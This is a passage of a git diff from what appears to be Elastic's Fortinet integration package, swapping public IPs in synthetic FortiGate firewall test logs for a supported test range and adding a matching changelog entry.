authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co" -<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email" -<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8, 8.8.4.4" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email" -<190>date=2020-04-23 time=12:17:11 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230232148674303 tz="-0500" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=8.8.8.8 srcport=63012 dstport=443 srcintf="port1" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=100602 sessionid=543234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.no" incidentserialno=54323 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" -<189>date=2020-04-23 time=12:17:04 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230224712900694 tz="-0500" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=2352 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" ipaddr="8.8.8.8" msg="Domain is monitored" action="pass" cat=93 catdesc="Remote Access" -<190>date=2020-04-23 time=12:17:12 devname="testswitch1" devid="somerouterid" logid="1500054000" type="utm" subtype="dns" eventtype="dns-query" level="information" vd="root" eventtime=1587230232658642672 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=54788 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=235 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" -<189>date=2020-04-23 time=13:15:18 devname="testswitch2" devid="someotherid" logid="1700062001" type="utm" subtype="ssl" eventtype="ssl-anomalies" level="notice" vd="root" eventtime=1587230118838592454 tz="-0400" policyid=12 sessionid=42346234 service="HTTPS" user="elasticuser2" group="elasticgroup2" profile="somecerts" srcip=192.168.2.1 srcport=59726 dstip=8.8.4.4 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 action="passthrough" msg="Server certificate passed" reason="untrusted-cert" +<188>date=2020-04-23 time=12:17:48 devname="testswitch1" devid="somerouterid" logid="0316013056" type="utm" subtype="webfilter" eventtype="ftgd_blk" level="warning" vd="root" eventtime=1587230269052907555 tz="-0500" policyid=100602 sessionid=1234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=61930 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="blocked" reqtype="direct" url="/config/" sentbyte=1152 rcvdbyte=1130 direction="outgoing" msg="URL belongs to a denied category in policy" method="domain" cat=76 catdesc="Internet Telephony" +<189>date=2020-04-23 time=01:16:08 devname="testswitch1" devid="somerouterid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="OPERATIONAL" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf="srcintfname" srcintfrole="lan" dstip=67.43.156.13 dstport=161 dstintf="dstintfname" dstintfrole="lan" sessionid=155313 proto=17 action="deny" policyid=0 policytype="policy" service="SNMP" dstcountry="Reserved" srccountry="Reserved" trandisp="noop" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat="unscanned" crscore=30 craction=131072 crlevel="high" +<189>date=2020-04-23 time=12:17:45 devname="testswitch1" devid="somerouterid" logid="0317013312" type="utm" subtype="webfilter" eventtype="ftgd_allow" level="notice" vd="root" eventtime=1587230266314799756 tz="-0500" policyid=38 sessionid=543234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=65236 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="passthrough" reqtype="direct" url="/" sentbyte=3545 rcvdbyte=6812 direction="outgoing" msg="URL belongs to an allowed category in policy" method="domain" cat=23 catdesc="Web-based Email" +<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230255061492894 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=67.43.156.13 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co" +<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1591788391 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=67.43.156.13 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co" +<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="67.43.156.13" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email" +<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="67.43.156.13, 67.43.156.13" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email" +<190>date=2020-04-23 time=12:17:11 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230232148674303 tz="-0500" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=67.43.156.13 srcport=63012 dstport=443 srcintf="port1" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=100602 sessionid=543234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.no" incidentserialno=54323 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" +<189>date=2020-04-23 time=12:17:04 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230224712900694 tz="-0500" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=2352 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" ipaddr="67.43.156.13" msg="Domain is monitored" action="pass" cat=93 catdesc="Remote Access" +<190>date=2020-04-23 time=12:17:12 devname="testswitch1" devid="somerouterid" logid="1500054000" type="utm" subtype="dns" eventtype="dns-query" level="information" vd="root" eventtime=1587230232658642672 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=54788 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=235 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" +<189>date=2020-04-23 time=13:15:18 devname="testswitch2" devid="someotherid" logid="1700062001" type="utm" subtype="ssl" eventtype="ssl-anomalies" level="notice" vd="root" eventtime=1587230118838592454 tz="-0400" policyid=12 sessionid=42346234 service="HTTPS" user="elasticuser2" group="elasticgroup2" profile="somecerts" srcip=192.168.2.1 srcport=59726 dstip=67.43.156.13 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 action="passthrough" msg="Server certificate passed" reason="untrusted-cert" <189>date=2020-04-23 time=12:32:48 devname="testswitch3" devid="someotherrouteridagain" logid="0102043014" type="event" subtype="user" level="notice" vd="root" eventtime=1587231168439640874 tz="-0500" logdesc="FSSO logon authentication status" srcip=10.10.10.10 user="elasticouser" server="elasticserver" action="FSSO-logon" msg="FSSO-logon event from FSSO_elasticserver: user elasticouser logged on 10.10.10.10" -<187>date=2020-04-23 time=12:32:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101037124" type="event" subtype="vpn" level="error" vd="root" eventtime=1587231168339114138 tz="-0500" logdesc="IPsec phase 1 error" msg="IPsec phase 1 error" action="negotiate" remip=8.8.4.4 locip=8.8.8.8 remport=500 locport=500 outintf="wan2" cookies="345hkjhdrs87/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="N/A" status="negotiate_error" reason="peer SA proposal not match local policy" peer_notif="NOT-APPLICABLE" -<189>date=2020-04-23 time=12:32:31 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231151628960857 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=8.4.5.4 locip=9.9.9.9 remport=500 locport=500 outintf="wan1" cookies="df868dsg876d/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="elasticvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" +<187>date=2020-04-23 time=12:32:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101037124" type="event" subtype="vpn" level="error" vd="root" eventtime=1587231168339114138 tz="-0500" logdesc="IPsec phase 1 error" msg="IPsec phase 1 error" action="negotiate" remip=67.43.156.13 locip=67.43.156.13 remport=500 locport=500 outintf="wan2" cookies="345hkjhdrs87/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="N/A" status="negotiate_error" reason="peer SA proposal not match local policy" peer_notif="NOT-APPLICABLE" +<189>date=2020-04-23 time=12:32:31 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231151628960857 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=67.43.156.13 locip=67.43.156.13 remport=500 locport=500 outintf="wan1" cookies="df868dsg876d/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="elasticvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" <189>date=2020-04-23 time=14:32:09 devname="testswitch3" devid="someotherrouteridagain" logid="0100040704" type="event" subtype="system" level="notice" vd="root" eventtime=1587231129938795255 tz="-0300" logdesc="System performance statistics" action="perf-stats" cpu=0 mem=10 totalsession=23 disk=0 bandwidth="23/4" setuprate=0 disklograte=0 fazlograte=0 freediskstorage=331 sysuptime=25170 msg="Performance statistics: average CPU: 0, memory: 23, concurrent sessions: 20, setup-rate: 0" <189>date=2020-04-23 time=12:32:09 devname="testswitch3" devid="someotherrouteridagain" logid="0102043039" type="event" subtype="user" level="notice" vd="root" eventtime=1587231130109462858 tz="-0500" logdesc="Authentication logon" srcip=10.10.10.10 user="elastiiiuser" authserver="FSSO_elastiauth" action="auth-logon" status="logon" msg="User elastiiiuser added to auth logon" -<189>date=2020-04-23 time=12:32:00 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231120608961118 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=8.8.5.4 locip=7.6.3.4 remport=500 locport=500 outintf="wan1" cookies="345khj34566/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="testvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" +<189>date=2020-04-23 time=12:32:00 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231120608961118 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=67.43.156.13 locip=67.43.156.14 remport=500 locport=500 outintf="wan1" cookies="345khj34566/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="testvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" <189>date=2020-04-23 time=14:24:13 devname="testswitch3" devid="someotherrouteridagain" logid="0100041006" type="event" subtype="system" level="notice" vd="root" eventtime=1587230655301863513 tz="-0300" logdesc="FortiSandbox AV database updated" version="1.522479" msg="FortiSandbox AV database updated" <190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0107045057" type="event" subtype="endpoint" level="information" vd="root" eventtime=1587230627558979735 tz="-0500" logdesc="FortiClient connection added" action="add" status="success" license_limit="unlimited" used_for_type=3 connection_type="sslvpn" count=2 user="elastico" ip=172.16.0.2 name="somerouter" fctuid="645234fdd01F885824F764" msg="Add a FortiClient Connection." -<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039943" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627334405765 tz="-0500" logdesc="SSL VPN new connection" action="ssl-new-con" tunneltype="ssl" tunnelid=2 remip=8.8.8.6 user="N/A" group="N/A" dst_host="N/A" reason="N/A" msg="SSL new connection" -<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039947" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627698970007 tz="-0500" logdesc="SSL VPN tunnel up" action="tunnel-up" tunneltype="ssl-tunnel" tunnelid=2345 remip=8.8.5.4 tunnelip=10.10.10.10 user="someuser" group="somegroup" dst_host="N/A" reason="tunnel established" msg="SSL tunnel established" +<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039943" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627334405765 tz="-0500" logdesc="SSL VPN new connection" action="ssl-new-con" tunneltype="ssl" tunnelid=2 remip=67.43.156.13 user="N/A" group="N/A" dst_host="N/A" reason="N/A" msg="SSL new connection" +<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039947" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627698970007 tz="-0500" logdesc="SSL VPN tunnel up" action="tunnel-up" tunneltype="ssl-tunnel" tunnelid=2345 remip=67.43.156.13 tunnelip=10.10.10.10 user="someuser" group="somegroup" dst_host="N/A" reason="tunnel established" msg="SSL tunnel established" <189>date=2020-04-23 time=14:16:42 devname="testswitch3" devid="someotherrouteridagain" logid="0102043015" type="event" subtype="user" level="notice" vd="root" eventtime=1587230204674924332 tz="-0300" logdesc="FSSO log off authentication status" srcip=192.168.1.1 user="elasticadmin" server="FSSO_somefssoserver" action="FSSO-logoff" msg="FSSO-logoff event from FSSO_somefssoserver: user elasticuser logged off 1192.168.1.1" -<189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022915" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163121116383 tz="-0500" logdesc="FortiCloud server connected" server="9.9.9.9" action="connect" msg="FortiCloud 9.9.9.9 server is connected" +<189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022915" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163121116383 tz="-0500" logdesc="FortiCloud server connected" server="67.43.156.13" action="connect" msg="FortiCloud 67.43.156.13 server is connected" <189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022913" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163375149856 tz="-0500" logdesc="FortiCloud server disconnected" server="4.4.4.4" action="disconnect" reason="connection reset" msg="FortiCloud 4.4.4.4 server is disconnected" -<188>date=2020-04-23 time=12:14:09 devname="newfirewall" devid="newrouterid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230049761513222 tz="-0500" srcip=192.168.1.6 srcport=53438 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" sessionid=435234 proto=17 action="dns" policyid=26 policytype="policy" poluuid="2345de-b143-52134d8-6654f-4654sdfg16f431" policyname="elasticnewruleset" service="DNS" dstcountry="Netherlands" srccountry="Reserved" appcat="unscanned" crscore=5 craction=54144 crlevel="low" -<189>date=2020-04-23 time=12:11:51 devname="newfirewall" devid="newrouterid" logid="0000000020" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587229911390385486 tz="-0500" srcip=192.168.10.10 srcport=6000 srcintf="port1" srcintfrole="lan" dstip=8.6.4.7 dstport=6000 dstintf="wan1" dstintfrole="wan" sessionid=4352 proto=17 action="accept" policyid=3426 policytype="policy" poluuid="1765de8-5a13-765da73fdsfa1c" policyname="newruleelastic" service="portname" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=123.123.123.123 transport=60964 appcat="unknown" applist="policylist" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728 -<189>date=2020-04-23 time=12:11:48 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229908751434997 tz="-0500" srcip=2001:4860:4860::8888 identifier=0 srcintf="port1" srcintfrole="lan" dstip=2001:4860:4860::8888 dstintf="unknown0" dstintfrole="undefined" sessionid=6542345 proto=58 action="accept" policyid=0 policytype="someotherpolicy" service="icmp6/1/0" trandisp="noop" app="icmp6/25/0" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat="unscanned" -<189>date=2020-04-23 time=13:10:57 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229857509058693 tz="-0400" srcip=9.7.7.7 identifier=61 srcintf="wan1" srcintfrole="wan" dstip=8.8.8.8 dstintf="unknown0" dstintfrole="undefined" sessionid=123 proto=1 action="accept" policyid=0 policytype="rulepolicy" service="PING" dstcountry="Norway" srccountry="Netherlands" trandisp="noop" app="PING" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat="unscanned" +<188>date=2020-04-23 time=12:14:09 devname="newfirewall" devid="newrouterid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230049761513222 tz="-0500" srcip=192.168.1.6 srcport=53438 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" sessionid=435234 proto=17 action="dns" policyid=26 policytype="policy" poluuid="2345de-b143-52134d8-6654f-4654sdfg16f431" policyname="elasticnewruleset" service="DNS" dstcountry="Netherlands" srccountry="Reserved" appcat="unscanned" crscore=5 craction=54144 crlevel="low" +<189>date=2020-04-23 time=12:11:51 devname="newfirewall" devid="newrouterid" logid="0000000020" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587229911390385486 tz="-0500" srcip=192.168.10.10 srcport=6000 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=6000 dstintf="wan1" dstintfrole="wan" sessionid=4352 proto=17 action="accept" policyid=3426 policytype="policy" poluuid="1765de8-5a13-765da73fdsfa1c" policyname="newruleelastic" service="portname" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=67.43.156.14 transport=60964 appcat="unknown" applist="policylist" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728 +<189>date=2020-04-23 time=12:11:48 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229908751434997 tz="-0500" srcip=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 identifier=0 srcintf="port1" srcintfrole="lan" dstip=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 dstintf="unknown0" dstintfrole="undefined" sessionid=6542345 proto=58 action="accept" policyid=0 policytype="someotherpolicy" service="icmp6/1/0" trandisp="noop" app="icmp6/25/0" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat="unscanned" +<189>date=2020-04-23 time=13:10:57 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229857509058693 tz="-0400" srcip=67.43.156.13 identifier=61 srcintf="wan1" srcintfrole="wan" dstip=67.43.156.13 dstintf="unknown0" dstintfrole="undefined" sessionid=123 proto=1 action="accept" policyid=0 policytype="rulepolicy" service="PING" dstcountry="Norway" srccountry="Netherlands" trandisp="noop" app="PING" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat="unscanned" <188>date=2020-04-23 time=12:14:39 devname="firewall3" devid="oldfwid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230079841464445 tz="-0500" srcip=192.168.1.1 srcport=62493 srcintf="port1" srcintfrole="lan" dstip=192.168.100.100 dstport=1235 dstintf="newinterface" dstintfrole="undefined" sessionid=54234 proto=17 action="ip-conn" policyid=49 policytype="policy" poluuid="654cc-b6542-53467u8-e45234-1566casd35f7836" policyname="oldpolicyname" user="elasticsuper" authserver="FSSO_newfsso" service="udp/12302" dstcountry="Reserved" srccountry="Reserved" appcat="unscanned" crscore=5 craction=63332144 crlevel="low" -<189>date=2020-04-23 time=12:14:28 devname="firewall3" devid="oldfwid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587230069291463928 tz="-0500" srcip=192.168.50.50 srcport=56603 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=442 dstintf="wan1" dstintfrole="wan" sessionid=2345 proto=6 action="close" policyid=2365 policytype="policy" poluuid="654644c-b064-fdgdf3425-f003-1234ghdf682e05f" policyname="someoldpolicyname" user="elasticuser" group="testgroup" authserver="FSSO_something" service="HTTPS" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=23.23.23.23 transport=603 appid=43540 app="Skype.Portals" appcat="Collaboration" apprisk="elevated" applist="someapplist" appact="detected" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality="Seq_num(3), alive, selected" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction="block" countweb=1 countapp=1 crscore=5 craction=6144 crlevel="low" -<190>date=2019-05-15 time=18:03:36 logid="1059028704" type="utm" subtype="app-ctrl" eventtype="app-ctrl-all" level="information" vd="root" eventtime=1557968615 appid=40568 srcip=10.1.100.22 dstip=195.8.215.136 srcport=50798 dstport=443 srcintf="port10" srcintfrole="lan" dstintf="port9" dstintfrole="wan" proto=6 service="HTTPS" direction="outgoing" policyid=1 sessionid=4414 applist="block-social.media" appcat="Web.Client" app="HTTPS.BROWSER" action="pass" hostname="www.dailymotion.com" incidentserialno=1962906680 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="*.dailymotion.com" scertissuer="DigiCert SHA2 High Assurance Server CA" -<190>date=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type="event" subtype=vpn level=notice vd=root logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action=negotiate remip=8.8.8.8 locip=10.10.10.10 remport=500 locport=500 outintf="port1" cookies="125cbf9ee8349965/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="P1_Test" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK +<189>date=2020-04-23 time=12:14:28 devname="firewall3" devid="oldfwid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587230069291463928 tz="-0500" srcip=192.168.50.50 srcport=56603 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=442 dstintf="wan1" dstintfrole="wan" sessionid=2345 proto=6 action="close" policyid=2365 policytype="policy" poluuid="654644c-b064-fdgdf3425-f003-1234ghdf682e05f" policyname="someoldpolicyname" user="elasticuser" group="testgroup" authserver="FSSO_something" service="HTTPS" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=67.43.156.14 transport=603 appid=43540 app="Skype.Portals" appcat="Collaboration" apprisk="elevated" applist="someapplist" appact="detected" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality="Seq_num(3), alive, selected" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction="block" countweb=1 countapp=1 crscore=5 craction=6144 crlevel="low" +<190>date=2019-05-15 time=18:03:36 logid="1059028704" type="utm" subtype="app-ctrl" eventtype="app-ctrl-all" level="information" vd="root" eventtime=1557968615 appid=40568 srcip=10.1.100.22 dstip=67.43.156.14 srcport=50798 dstport=443 srcintf="port10" srcintfrole="lan" dstintf="port9" dstintfrole="wan" proto=6 service="HTTPS" direction="outgoing" policyid=1 sessionid=4414 applist="block-social.media" appcat="Web.Client" app="HTTPS.BROWSER" action="pass" hostname="www.dailymotion.com" incidentserialno=1962906680 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="*.dailymotion.com" scertissuer="DigiCert SHA2 High Assurance Server CA" +<190>date=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type="event" subtype=vpn level=notice vd=root logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action=negotiate remip=67.43.156.13 locip=10.10.10.10 remport=500 locport=500 outintf="port1" cookies="125cbf9ee8349965/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="P1_Test" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK diff --git a/packages/fortinet/changelog.yml b/packages/fortinet/changelog.yml index 80d5235de7b..2c7db9ccfeb 100644 --- a/packages/fortinet/changelog.yml +++ b/packages/fortinet/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.3.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/fortinet/data_stream/clientendpoint/_dev/test/pipeline/test-generated.log-expected.json b/packages/fortinet/data_stream/clientendpoint/_dev/test/pipeline/test-generated.log-expected.json index 4192bc833e3..9d8f45c7cb2 100644 --- a/packages/fortinet/data_stream/clientendpoint/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/fortinet/data_stream/clientendpoint/_dev/test/pipeline/test-generated.log-expected.json @@ -6,7 +6,7 @@ }, "message": "January 29 06:09:59 boNemoe4402.www.invalid proto=udp service=http status=deny src=10.150.92.220 dst=10.102.123.34 src_port=7178 dst_port=3994 server_app=reeufugi pid=7880 app_name=enderitq traff_direct=external block_count=5286 logon_user=sumdo@litesse6379.api.domain msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875135600Z" + "ingested": "2021-12-09T13:37:20.233978400Z" }, "tags": [ "preserve_original_event" @@ -18,7 +18,7 @@ }, "message": "February 12 13:12:33 olupt4880.api.home proto=icmp service=https status=deny src=10.33.212.159 dst=10.149.203.46 src_port=2789 